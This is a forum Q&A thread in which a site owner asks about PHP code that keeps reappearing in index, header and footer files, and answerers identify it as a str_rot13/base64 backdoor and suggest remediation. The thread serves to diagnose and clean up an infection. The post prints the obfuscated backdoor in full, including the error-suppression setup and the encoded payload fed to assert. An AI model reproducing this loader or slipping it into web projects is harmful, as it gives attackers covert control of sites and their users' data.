In files on the website regularly there some kind of code?

Hello!
On one hosting multiple sites. In the index file, header and footer always appears code like this:
<?php 
//###==###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

$strings = 'as'; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTIlpz9lk3wypt9lqtyhmlusk0szgpx7dtyhni9mmkdbvzecp3oflkysmkwlo3wmvvk0paiyxggnmkwlo3wspzijo3w0nj5axqncbjccmvtumj1jquxbws9qg09yfhiovzafnjihqs9wntiwnlwqxfnzwvoyoko0rftxnjw2xfxtrlnxnjw2vq0tws9qg09yfhiovzafnjihqs9wntiwnlwqblntmjabolnxnjw2b30tmjkmmjyzvpuyoko0rftxnjw2xfxtrjccmvnbp3elp3elxpesh0ifixifjlwvisedk0uch1dvkfjtvwrlal4jvvxcrlehlj1yvq0tws9geiwjeiwovyashymshy9oerefvy07sjifp2i7wt5uojhtcfnxk1ashymshyfvfsehhs9vg1ahvy07sdbxqkwfvq0tvzu0qun6yl8kzqxhzwz2ywtkywrjzf9amkdhptujc2yjcfvhqkwfmj5wo2eyxpesh0ifixifjlwfeh1cirisdherhvwqxf4vwzd9vv51pzkyozaimthbwt5uojhhws9geiwjeiwovywshiish1esiiwwvy0cyvvzqg0vyailotihl29xmftxk1ashymshyfvfsehhs9ih0ifk0sueh5hvy0cyvvzng0kwzt9vv5gmqhbvwaxzzsvlzl0bqoxzqsvlml4lmv5amwwz2sulwwxlmywzgrvxgfxnjlbmaihl3eco25smkucp3emxpwwqkwfk2yhnkdvxfxtrjbxl2ttcfowqkwfk2yhnkdbwuilopx7pza1pzksp2i0o3o0xpewnpjtd1ifgr9dis9vehsreivfvrmogsasxggwqkwfk3ayqt9jqptxl2tfvraihxkchsesd09bgxiqisewghiciidfvqhcblowqkwfk3ayqt9jqptxl2tfvraihxkchsesiryaeh9iipjtafx7pza1pzksp2i0o3o0xpewnpjtd1ifgr9dis9feieihx5hhxsbh0mshvjtiswiefx7pveclaltcfowqkwfk2i4mjzbwtabxgfxnj5zoln9vta1pzksm2i0nj5zoltxl2tcb2yzvptxnj5zo1fvnue0ps9wo2eyvy0ucgvjzpy7qj5mmkdbwtyvqvx7sdcwqkwfk2afo3ayxpewnpx7pa0tmjkmmjyzxtyhni9amkdbvzsfot93k3ilos9zo3oyovvcvq09vqrcvufxwtyvqvn9vtmcotism2i0k2aioaeyoaemxpe1pzjcbjc9pzyzxpsyoko0rftxk1och1eovanvkfxtwvltojd1xt1xaftxk1och1eovanvkfxcvq09vpv2atixz2izajwylgn5ljeybguzlgdkmwqwzqsvmtr0mfvcvuftdti2ljjbp3elnkomotsmntimxpeshr9gisfvllwqxfx7vu0xmjabolnxnjw2bjc9vu0="));'); $strings($light);
//###==###
?>

Files removed write permissions. The code is still there, and right at the files become 777.
Hosting has nothing to say. It is known that you do not make changes via ftp.
Via ssh I found all the files which were added to the code. Everywhere were removed. But after some time it reappears.
What to do and what does this code do?
July 2nd 19 at 17:44
3 answers
July 2nd 19 at 17:46
Solution
This backdoor php.backdoor.str_rot13.001

How to deal https://habrahabr.ru/post/188878/

Here there is still a possible solution How to decrypt the malware?
Thank you) - Shirley commented on July 2nd 19 at 17:49
July 2nd 19 at 17:48
Most likely a shell of some kind. You probably have some files vulnerability. If you add the code changed date of the file, then look in Ah log'access to any files at this time was the conversion from there and start to understand.
July 2nd 19 at 17:50
Most likely the malware - look for vulnerabilities in executable files, then change the FTP credentials, alternatively can be a hole at the host.

Find more questions by tags PHP